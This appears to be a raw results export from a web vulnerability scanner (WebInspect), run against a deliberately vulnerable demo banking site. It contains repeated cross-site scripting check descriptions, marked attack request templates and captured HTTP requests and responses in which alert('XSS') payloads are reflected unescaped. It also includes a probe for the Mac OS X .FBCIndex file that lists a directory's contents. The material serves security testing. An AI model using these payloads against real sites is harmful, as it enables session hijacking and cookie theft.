Possible TextArea Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This particular type takes place when input is returned embedded in the TEXTAREA paramaters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp.bak
Content-Length: 170
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=Joe&txtLastName=<attack></textarea><script>alert('XSS')</script></attack><script>alert\('XSS'\)</script>GET /plink.asp?a=b&c=>"><script>alert("XSS")</script> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:36:57 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 197
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "a" = b</P>
<P>The parameter "c" = >"><script>alert("XSS")</script></P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Double Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the single quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?a=b&c=<attack>>"><script>alert("XSS")</script></attack> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\("XSS"\)<\/script>POST /testing/pcomboindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/testing/
Content-Length: 49
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=>"'><img%20src="javascript:alert('XSS')">HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:38 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 193
Content-Type: text/html
Cache-control: private
<html>
<body>
A user should never see this text<br>
this page is a redirect only page. The page that the user
selected was >"'><img src="javascript:alert('XSS')">
</body>
</html>
Possible IMG-Tag Embedded Javascript Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place by embedding potentially malicious JavaScript code using an IMG tag with a specific JavaScript link as its source. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/testing/
Content-Length: 49
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=<attack>>"'><img%20src="javascript:alert('XSS')"></attack>javascript:alert\('XSS'\)">GET /banklogin.asp?err=>"'><img%20src="javascript:alert('XSS')"> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:37:05 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4954
Content-Type: text/html
Cache-control: private
Set-Cookie: state=; path=/
Set-Cookie: userid=; path=/
Set-Cookie: username=; path=/
Set-Cookie: sessionid=; path=/
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<TABLE BGCOLOR="#ffffff" STYLE="border: 3px solid black">
<TR>
<TD
STYLE="border-left: 12px solid #2E7AA3; border-top: 7px solid #2E7AA3"
HEIGHT="47" ROWSPAN="2" VALIGN="TOP"><IMG
SRC="/images/freebank-logo2.gif" ALIGN="LEFT" BORDER="0" WIDTH="150"
HEIGHT="50"><BR><BR></TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571" HEIGHT="47"
VALIGN="TOP"> </TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571"
VALIGN="TOP"> </TD>
</TR>
<TR>
<TD WIDTH="571" VALIGN="TOP" ROWSPAN="7" HEIGHT="49">
<TABLE>
<TR>
<TD BGCOLOR="#2E7AA3" STYLE="border: 1px solid black" WIDTH="258"
HEIGHT="217">
<FORM ACTION="login1.asp" METHOD="post">
<CENTER>>"'><img src="javascript:alert('XSS')"><br>Username:<BR><INPUT TYPE="text" NAME="login"
STYLE="border: 1px solid black; spacing: 0"><BR>Password:<BR><INPUT TYPE="password"
NAME="password" STYLE="border: 1px solid black; spacing: 0"><BR><INPUT
TYPE="radio" NAME="graphicOption" VALUE="minimum" CHECKED="CHECKED"><FONT
SIZE="-1">Minimum Graphics</FONT><BR><INPUT TYPE="radio" NAME="graphicOption"
VALUE="standard"><FONT SIZE="-1">Standard Graphics</FONT><BR><BR><INPUT
TYPE="submit" STYLE="border: 1px solid black"
VALUE=" Access Accounts "><BR></CENTER></FORM></TD>
<TD STYLE="border: 1px solid black" WIDTH="304" HEIGHT="217"
ROWSPAN="2"><IMG SRC="/images/lock.gif" WIDTH="304" HEIGHT="266"
BORDER="0"></TD>
</TR>
<TR>
<TD BGCOLOR="ffffff" STYLE="border: 1px solid black" WIDTH="258" HEIGHT="241"
VALIGN="TOP"><FONT SIZE="-2">We are confident of our system's ability to
protect all transactions; however, this is not an invitation for people to
attempt unauthorized access to the system. This is a private computing system
which is restricted to authorized individuals. Actual or attempted unauthorized
use of this computer system may result in criminal and/or civil prosecution. We
reserve the right to view, monitor, and record activity on the system without
notice or permission. Any information obtained by monitoring, reviewing, or
recording is subject to review by law enforcement organizations in connection
with the investigation or prosecution of possible criminal activity on the
system. If you are not an authorized user of this system or do not consent to
continued monitoring, exit the system at this time. </FONT></TD>
</TR>
</TABLE></TD>
<TD WIDTH="175" VALIGN="TOP" ROWSPAN="7"><table width="175" border="0" cellspacing="3" cellpadding="5">
<tr>
<td STYLE="border: 1px solid black"><p><img src="images/SPI_logo.jpg" width="150" height="36"></p>
<p><font size="2" face="Arial, Helvetica, sans-serif">If you would
like a free trial version of WebInspect to test this website
site.</font></p>
<p><font size="2" face="Arial, Helvetica, sans-serif"><a href="http://www.spidynamics.com/download.html" target="_blank"><strong>Download Click Here</strong></a></font></p></td>
</tr>
</table></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-login.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><A
HREF="/pindex.asp"><IMG SRC="/images/financial-planning.gif" ALIGN="LEFT"
BORDER="0" WIDTH="150" HEIGHT="20"></A></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="19"><IMG SRC="/images/services.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="24"><IMG SRC="/images/your-accounts.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-support.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border-left: 12px solid #2E7AA3" WIDTH="162"
ALIGN="CENTER">
<FORM ACTION="rootlogin.asp" METHOD="post">
<P><FONT SIZE="-1" FACE="Arial"> Register for an Interest Checking
Account with FreeBank:</FONT></P>
<P><FONT SIZE="-1" FACE="Arial">First Name:</FONT><INPUT
TYPE="text" NAME="txtPassPhrase"
STYLE="border: 1px solid black; spacing: 0"><BR><FONT SIZE="-1"
FACE="Arial">Last Name:</FONT><INPUT TYPE="text" NAME="txtName"
STYLE="border: 1px solid black; spacing: 0"><BR>
<INPUT TYPE="hidden" NAME="txtHidden" VALUE="This was hidden from the user">
<INPUT TYPE="submit" STYLE="border: 1px solid black"
VALUE="Register"></P></FORM></TD>
</TR>
</TABLE>
</BODY>
</HTML>
Possible IMG-Tag Embedded Javascript Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place by embedding potentially malicious JavaScript code using an IMG tag with a specific JavaScript link as its source. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?err=<attack>>"'><img%20src="javascript:alert('XSS')"></attack> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/login1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
javascript:alert\('XSS'\)">GET /join.asp?name=&email=&surname=&house=&street=&address2=1"style="background:url(javascript:alert('XSS'))"%20"&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:24 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4025
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE="1"style="background:url(javascript:alert('XSS'))" ""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Form Injection Cross-Site Scripting VulnerabilityCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This type of cross-site scripting attack takes place by using the least amount of non standard characters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=<attack>1"style="background:url(javascript:alert('XSS'))"%20"</attack>&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
"style="background:url\(javascript:alert\('XSS'\)\)GET /plink.asp?a=>"><script>alert('XSS')</script>&c=12 HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:36:57 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 198
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "a" = >"><script>alert('XSS')</script></P>
<P>The parameter "c" = 12</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Single Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the double quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?a=<attack>>"><script>alert('XSS')</script></attack>&c=12 <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\('XSS'\)<\/script>GET /_vti_txt/.FBCIndex HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:49:19 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
OSX Content File (FBCIndex)By exploiting the case-insensitivity of HFS+, an attacker can evade Apache's access controls.
Using mod_hfs (which takes care of case-insensitivity in directory names) and using < FilesMatch> (with well-chosen regular expressions) instead of < Files> directives (to take care of case-insensitivity in filenames), we can "cure" the case-insensitivity problem and restore Apache's access controls. <br><br>
However, there is another problem lurking. A vulnerability has been found that allows remote attackers to list the content of the directory and view the index file created for those files by requesting an a special file that automatically created by Mac OS X.GET /_vti_txt/<attack>.FBCIndex</attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
40[13] |200 |Bud2GET /forgot2.asp?msg2=no&msg=>"><script>alert("XSS")</script> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/forgot1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:01 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 1846
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Forgotten Password</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>F O R G O T T E N P A S S W O R D</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<tr><td bgcolor=#c000ff><b><center>Forgotton Password</center></a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center">>"><script>alert("XSS")</script></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#c000ff><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="login.asp">Login</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="join.asp">Join</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
</form>
</Table>
</table>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Double Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the single quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
